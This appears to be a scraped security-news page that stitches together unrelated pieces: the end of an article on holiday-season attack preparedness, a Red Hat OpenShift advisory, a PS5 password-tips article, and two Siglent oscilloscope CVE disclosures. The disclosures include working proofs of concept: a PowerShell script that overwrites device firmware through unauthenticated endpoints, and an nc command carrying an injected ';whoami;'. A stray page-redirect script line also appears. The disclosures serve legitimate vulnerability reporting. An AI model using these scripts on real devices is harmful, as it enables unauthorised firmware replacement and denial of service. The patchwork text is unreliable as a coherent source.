Companies should closely monitor networks and systems for suspicious activity by combining employee and AI-led strategies in order to maximize time and cost efficiency, allowing AI monitoring and data protection to fill in the gaps when IT teams are spread thin.

Security departments should also schedule security refresh trainings ahead of summer vacation season. Schedule thoughtfully to ensure employees have dedicated time to review security practices and absorb the information.

**4\. Now Is the Time for IT Security Teams to Mobilize**

It's necessary to develop plans to accomplish the preceding three steps and also ensure business can continue when an attack inevitably does occur. A business continuity plan will help you react appropriately and expeditiously in the event of an attack, thereby limiting the effects and scope of the crisis. Plans should include:

*   An outline of who needs to be involved and their responsibilities, with contingencies in place that account for staff vacation plans
*   Detection and initial analysis of the attack
*   Defining the scope of the attack
*   Determining the origination of the attack (who/what/where/when)
*   Determining if the attack has concluded or is ongoing
*   Determining how the attack occurred
*   Containing the impact and propagation of the attack
*   Eradicating the malware and vulnerabilities that may have permitted its ingress and propagation
*   Recovering data from hardened backups
*   Responding to regulatory and/or contractual obligations as a result of the breach

**Bad Actors Come Prepared, but So Can Companies**

Good security people prepare well. Relationships, training, awareness, technologies and incident response playbooks all help to manage and reduce risk. While long weekends and other time off are rarely true holidays for security professionals, there are steps we can take to prepare and protect our organizations, so employees can remain vigilant while also enjoying well-deserved time off.

Cybercrime Doesn't Take a Vacation

Buffer overflow in Wi-Fi Commissioning MicriumOS example in Silicon Labs Gecko SDK v4.2.3 or earlier allows connected device to write payload onto the stack.


top.location='https://community.silabs.com/ex/errorduringprocessing.jsp'

CVE-2023-2686

Red Hat Security Advisory 2023-3536-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.3.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.13.3 packages and security update  
Advisory ID:       RHSA-2023:3536-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3536  
Issue date:        2023-06-13  
CVE Names:         CVE-2023-30861   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.3 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Ironic content for Red Hat OpenShift Container Platform 4.13 - noarch  
Red Hat OpenShift Container Platform 4.13 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.13.3. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3537

Security Fix(es):

* flask: Possible disclosure of permanent session cookie due to missing  
Vary: Cookie header (CVE-2023-30861)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2196643 - CVE-2023-30861 flask: Possible disclosure of permanent session cookie due to missing Vary: Cookie header

6. Package List:

Red Hat OpenShift Container Platform 4.13:

Source:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.src.rpm  
openshift-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.src.rpm  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el8.src.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.src.rpm

aarch64:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.aarch64.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.aarch64.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.aarch64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.aarch64.rpm

noarch:  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.13.0-202305301841.p0.g148be47.assembly.stream.el8.noarch.rpm

ppc64le:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.ppc64le.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.ppc64le.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.ppc64le.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.ppc64le.rpm

s390x:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.s390x.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.s390x.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.s390x.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.s390x.rpm

x86_64:  
cri-o-1.26.3-8.rhaos4.13.git9232b13.el8.x86_64.rpm  
cri-o-debuginfo-1.26.3-8.rhaos4.13.git9232b13.el8.x86_64.rpm  
cri-o-debugsource-1.26.3-8.rhaos4.13.git9232b13.el8.x86_64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el8.x86_64.rpm

Red Hat OpenShift Container Platform 4.13:

Source:  
NetworkManager-1.42.2-2.el9_2.src.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.src.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.src.rpm  
openshift-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.src.rpm  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el9.src.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.src.rpm

aarch64:  
NetworkManager-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-team-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-tui-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.aarch64.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.aarch64.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.aarch64.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.aarch64.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.aarch64.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.aarch64.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.aarch64.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.aarch64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.aarch64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.aarch64.rpm

noarch:  
NetworkManager-config-connectivity-redhat-1.42.2-2.el9_2.noarch.rpm  
NetworkManager-config-server-1.42.2-2.el9_2.noarch.rpm  
NetworkManager-dispatcher-routing-rules-1.42.2-2.el9_2.noarch.rpm  
NetworkManager-initscripts-updown-1.42.2-2.el9_2.noarch.rpm  
openshift-ansible-4.13.0-202305301841.p0.g148be47.assembly.stream.el9.noarch.rpm  
openshift-ansible-test-4.13.0-202305301841.p0.g148be47.assembly.stream.el9.noarch.rpm

ppc64le:  
NetworkManager-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-team-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-tui-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.ppc64le.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.ppc64le.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.ppc64le.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.ppc64le.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.ppc64le.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.ppc64le.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.ppc64le.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.ppc64le.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.ppc64le.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.ppc64le.rpm

s390x:  
NetworkManager-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-team-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-tui-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.s390x.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.s390x.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.s390x.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.s390x.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.s390x.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.s390x.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.s390x.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.s390x.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.s390x.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.s390x.rpm

x86_64:  
NetworkManager-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-adsl-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-adsl-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-bluetooth-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-bluetooth-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-cloud-setup-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-cloud-setup-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-debugsource-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-libnm-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-libnm-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-libnm-devel-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ovs-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ovs-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ppp-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-ppp-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-team-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-team-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-tui-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-tui-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wifi-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wifi-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wwan-1.42.2-2.el9_2.x86_64.rpm  
NetworkManager-wwan-debuginfo-1.42.2-2.el9_2.x86_64.rpm  
conmon-2.1.7-1.1.rhaos4.13.el9.x86_64.rpm  
conmon-debuginfo-2.1.7-1.1.rhaos4.13.el9.x86_64.rpm  
conmon-debugsource-2.1.7-1.1.rhaos4.13.el9.x86_64.rpm  
cri-o-1.26.3-9.rhaos4.13.git9232b13.el9.x86_64.rpm  
cri-o-debuginfo-1.26.3-9.rhaos4.13.git9232b13.el9.x86_64.rpm  
cri-o-debugsource-1.26.3-9.rhaos4.13.git9232b13.el9.x86_64.rpm  
openshift-clients-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.x86_64.rpm  
openshift-clients-redistributable-4.13.0-202305312300.p0.g05d83ef.assembly.stream.el9.x86_64.rpm  
openshift-hyperkube-4.13.0-202305312300.p0.g7a891f0.assembly.stream.el9.x86_64.rpm

Ironic content for Red Hat OpenShift Container Platform 4.13:

Source:  
python-flask-2.0.1-4.el9.2.src.rpm

noarch:  
python-flask-doc-2.0.1-4.el9.2.noarch.rpm  
python3-flask-2.0.1-4.el9.2.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30861  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIlEuNzjgjWX9erEAQhzZw//dt8uX+TXD7vD7cyQwgzBw8K+7q/ZGx+/  
iXzS5+ZmpJSnKgRpXjIDdWuErCxmaG3XNEla9VCNSY5tqrLLXA0tbA9IhiMFxutf  
uft7Qx/29UA7ROKSGBGT9Se2qP+3QC3E10vFYQ4OUqc+36fjoZF+EcxshkG3nQwh  
j9YaEnN2u10zz5OG19kJD2yfFF6bkc2Zk0twIX7B/xh4U7UObzzsDe9MrWtCRsqr  
AikryJs6Is7PnGPsfEQb7ZbeuaIkN74QoXTpO7+bsuTgIZMxnQXv7EaoB7JULAmT  
j/g0o1caIuC+MKkQTXQPPXnVzhrsQnEPo7oUYW+X1xFbXT+Nol46gnNSvetIeoAw  
YF9WwDEdHS3bQs8Rk+FsTPhGhnJ8cpPlmfDjkOFiWsxshDNULEGrHVMfT0CW2GaZ  
NP3En6nHsI4tbE/Ad4EFOmcSjTlwualSLLk6lgmh6ySbS9mZ4cy4JoBep8/VfajJ  
2pWjLuQRlnTqflu9j0Pkcx19ZGRsUC3gYLUsRyD/Zu1+kUSMVy3Cl44YYZUiqAjN  
13iWnZguP1rbVJSIz4sjC/MqHMBYeyv7lx8iLzx7RZsrWTbCW1ueYsW63XIjI0TD  
Robwqlz69Tge3t338Z6FArsFXZCKqAdPwhyQr490kcTkSNc/POp9AR4VkAnPpJxe  
0I6IQfiKXeo=  
=MVJf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3536-01

By Owais Sultan
A strong password for your PS5 enhances security, thwarting unauthorized access and protecting your personal information and gaming…
This is a post from HackRead.com Read the original post: Setting Strong and Unique Passwords: The First Line of Defense for PS5 Security

A strong password for your PS5 enhances security, thwarting unauthorized access and protecting your personal information and gaming progress, ensuring a safer and more enjoyable gaming experience. Let’s dive into the ins and outs of it!

Sony has a bug bounty program for PlayStation, in which security researchers can report vulnerabilities and earn up to $50,000. However, for unsuspecting users, the first line of defence against hackers for their PS5 system, personal information, and online gaming identity is creating strong and distinctive passwords. It is important to ensure that passwords are at least 8 characters long and include a mix of upper- and lowercase letters, digits, and symbols to guarantee security.

**Tricks Of The Trade For Ultimate Safety**

Avoid using terms or phrases that are widely used as passwords, as hackers may quickly guess them. Moreover, refrain from using the same password across gaming platforms, such as TheLostGamer.com, and other accounts. Instead, make unique passwords for each account you have.

Changing your passwords often is another crucial step in maximizing your security against any online dangers. Lastly, consider adopting a password manager to save all your credentials in one safe location. Doing this allows you to access them anytime you need them without remembering them all.

Lastly, consider adopting a password manager to save all your credentials in one safe location. Doing this allows you to access them anytime you need them without remembering them all.

**Keeping System Software Regularly Updated**

You must update your system software to protect your PS5 console from hackers. You should check for new updates on the PlayStation Network often to ensure you have the most recent firmware for safe gaming, especially when using your PS5 to play GTA5 or any other game.

Additionally, you may configure automatic downloads to download and install any new updates as soon as they become available. You should be sure to apply any security updates or bug fixes that Sony may provide. This will assist in defending your console from possible security flaws and harmful assaults.

It is crucial to look out for any unauthorized firmware changes that independent developers could provide. These unauthorized modifications may sometimes provide extra functionality or performance gains, but if they are not adequately tested and validated, they can also pose security concerns and other problems.

To protect the security of your PS5 system, it is essential to stick with official firmware upgrades wherever possible.

**Enabling Two-Factor Authentication**

Another layer of protection, called Two-Factor Authentication (2FA), helps shield your PS5 console from hackers. To access your account, you need two distinct kinds of identification: a password and a code sent to your phone number or email address.

With both pieces of information, it becomes more difficult for someone to access your account. You must sign in to the PlayStation Network website and choose “Security” from the menu to activate 2FA on your PS5 system. Then, choose “Two-Step Verification” and follow the on-screen instructions.

Every time you log in or change your account settings after that, you will be prompted to input a verification code. Thanks to this extra degree of protection, your data will be protected from potential hackers.

Use only authorized software and firmware to keep your PS5 console safe from intruders. Unauthorized changes can be harmful and may result in security holes that bad actors might exploit. Maintaining your console updated with Sony’s most recent fixes and upgrades is also crucial.

Additionally, you should ensure that you only download software and firmware from reputable websites since doing so might expose your machine to malicious malware.

Finally, to prevent unwanted access, it’s crucial to establish strong passwords for each account connected to your console. By following these instructions, you can keep your PS5 console safe and secure from hackers.

**Protecting Network Connections**

It would be best if you secured your Wi-Fi network to keep your PS5 system safe from cyberpunks. To do this, change your router’s default name and password first. This will make it more difficult for hackers to figure out the passwords and access your network.

Additionally, activating WPA2 encryption on your router will provide additional protection. A virtual private network (VPN) should also be used to encrypt any data that travels across your network. This will ensure that any sensitive information exchanged over the internet is better protected.

Lastly, you need to install a firewall on your PS5 console. A firewall can prevent harmful traffic from accessing your system and notify you if any unusual behaviour is found.

By completing these actions, you can guarantee that your PS5 system is safe and secure from prospective hackers.

**Being Wary of Suspicious Emails and Links**

The most crucial step in defending your PS5 console from phishing and malware attacks is to be careful of dubious emails and links. Never open or click on any links in emails you receive from unknown senders. The email could still include malicious malware that can infect your machine, even though it seems genuine.

Moreover, make sure you only download software from reputable websites. Downloading from a website you don’t know or trust is not recommended. Ensure your computer continuously operates with the most recent antivirus software installed. By doing this, you can defend your machine against harmful software hidden in emails or web pages.

Ultimately, update your passwords frequently and always use strong ones. This will make it more likely that, even if someone were to gain access to one of your accounts, they wouldn’t be able to use the same password to access any of your other accounts.

Adhering to these easy procedures may help defend yourself and your PS5 console.

**Regularly Monitoring Account Activity**

It is critical to periodically check your account activity for any unusual or unauthorized behavior to safeguard the security of your PS5 console.

First, set up two-factor authentication so that each time you log in, you will be required to input a code given to your phone or email address. This will aid in defending against hackers and other nefarious characters attempting to access your account.

Additionally, be careful to frequently update your passwords and use strong passwords for each account. Any strange behavior on your account, such as transactions or downloads you disapproved, should also be noted. If you see anything unusual, contact customer care right away and take action to safeguard your account.

To be informed of any questionable activity on your account, consider setting up alerts. By following these instructions, you may defend yourself against possible dangers and prevent unauthorized access to your PS5 console.

**Concluding**

In today’s digital age, we must be aware of security threats and protect ourselves and our sensitive information. In this chat, we discussed several tips for protecting network connections, being wary of suspicious emails and links, and regularly monitoring account activity.

Using strong passwords, encryption, firewalls, and VPNs, being cautious of suspicious emails and links, and regularly monitoring account activity can help prevent unauthorized access to our devices and sensitive information.

It is essential to stay vigilant and proactive to protect ourselves from security threats and stay safe online.

**RELATED ARTICLES**

1.  Xbox Two vs PS 5: Which console wins the race?
2.  FBI uses PlayStation to bust a large-scale drug deal
3.  PlayStation serial number leads Feds to bust a drug ring
4.  5 Casual Games You Can Play on Your Mobile Browser Now

Setting Strong and Unique Passwords: The First Line of Defense for PS5 Security

Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS is vulnerable to Incorrect Access Control. An unauthenticated attacker can overwrite firmnware.

**Description**

Siglent SDS 1104X-E SDS1xx4X-E\_V6.1.37R9.ADS is vulnerable to Incorrect Access Control. An unauthenticated attacker can overwrite firmnware.

**Discovery Information**

Date: December 2022  
Discoverer: Bret McDanel

**Versions**

At least SDS1xx4X-E\_V6.1.37R9.ADS, and possibly earlier. Reportedly fixed May 2023. It is unknown if other devices have a similar flaw as they were unavailable to the researcher at the time research was performed.

**Background**

The SIGLENT SDS1000X-E is a two and four channel oscilloscope. Controlling the various features is an embedded system running Linux. The oscilloscope has an ethernet port and optional USB wifi and has an enabled embedded web server.

**References**

https://siglent.com

**Vulnerability****CWE 284: Improper Access Control****Affected Ports**

*   Web Port: 80 (tcp)

**Discussion**

Two PHP scripts do not require authentication. One script can be used to upload firwmare, the other will expand the firmware and ready it for installation at next reboot.

The first script, /deviceupdate.php, requires the file to be sent as an application/octet-stream and end in .ADS.

The next script, /device\_read\_write.php, accepts certain commands one of which causes the firmware to be unpackaged and readied for installation. It relies upon information that is output from /deviceupdate.php.

The firmware is encrypted with a modified DES algorithm. However, this presents little challenge as there are programs that have been public for over a decade that will unpack existing firmware files and allow for repacking into new, valid, firmware files. This process is documented at length on relevant forums to the oscilloscope in general.

**Proof of Concept****Language: Powershell**

    $firmware = "/path/to/firmware.ADS"
    $host = "ip of target"
    
    try {
        # Upload firmware
        $WebParams = @(
            Method = "POST"
            Uri = "${host}/deviceupdate.php"
            ContentType = "application/octet-stream"
            Form = @{
                "in_device_version" = Get-Item -Path $firmware
            }
        )
        $resp = Invoke-WebRequest @WebParams -ErrorAction Stop
        $jsonData = ($resp.content | ConvertFrom-Json)
    
        # Unpack firwmare
        $cmd="%7B%22path%22%3A%22$($jsonData.path)%22%2C%22versionname%22%3A%22$($jsonData.versionname)%22%2C%22type%22%3A%22SSG%22%2C%22to%22%3A%22127.0.0.1%22%7D"
        $WebParams = @(
            Method = "POST"
            Uri = "${host}/device_read_write.php"
            Form = @{
                cmd = $cmd
            }
        )
        Invoke-WebRequest @WebParams -ErrorAction Stop
    } catch {
        Write-Error "Unable to write firmware $($_.Exception.Response.ReasonPhrase)"
    }
    Write-Host "Firmware uploaded, reboot device to install new firmware (use CVE-2023-25367)"
    
    

**Mitigation**

It is advised to upgrade to the current version of firmware. Further, IoT devices, such as oscilloscopes, should be placed on a segregated network and access to the affected ports be blocked from untrusted hosts.

CVE-2023-25368: CVE/CVE-2023-25368.md at main · BretMcDanel/CVE

Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS is vulnerable to Denial of Service on the user interface triggered by malformed SCPI command.

**Description**

Siglent SDS 1104X-E SDS1xx4X-E\_V6.1.37R9.ADS is vulnerable to Denial of Service on the user interface triggered by malformed SCPI command.

**Discovery Information**

Date: December 2022  
Discoverer: Bret McDanel

**Versions**

At least SDS1xx4X-E\_V6.1.37R9.ADS, and possibly earlier. Reportedly fixed May 2023. It is unknown if other devices have a similar flaw as they were unavailable to the researcher at the time research was performed.

**Background**

The SIGLENT SDS1000X-E is a two and four channel oscilloscope. Controlling the various features is an embedded system running Linux. The oscilloscope has an ethernet port and optional USB wifi.

Standard Commands for Programmable Instruments (SCPI) is a standard for syntax and commands to use in controlling programmable test and measurement devices. -- Source Wikipedia

**References**

https://siglent.com  
https://en.wikipedia.org/wiki/Standard\_Commands\_for\_Programmable\_Instruments

**Vulnerability****CWE 284: Improper Access Control****Affected Ports**

*   SCPI Ports: 5024 (tcp), 5025 (tcp)
*   Web Port: 80 (tcp)

**Discussion**

The SCPI processes bind to two different network ports, 5024 and 5025. Neither require authentication. A malformed SCPI command can be sent that causes the main process to crash. When this occurs the web interface, physical buttons, and physical display cease functioning.

**Proof of Concept**

    nc 192.168.1.42 5025 <<< "SYST:COMM:LAN:IPAD 192.168.1.42;whoami;\n"
    

**Mitigation**

It is advised to upgrade to the current version of firmware. Further, IoT devices, such as oscilloscopes, should be placed on a segregated network and access to the affected ports be blocked from untrusted hosts.

Tag

#wifi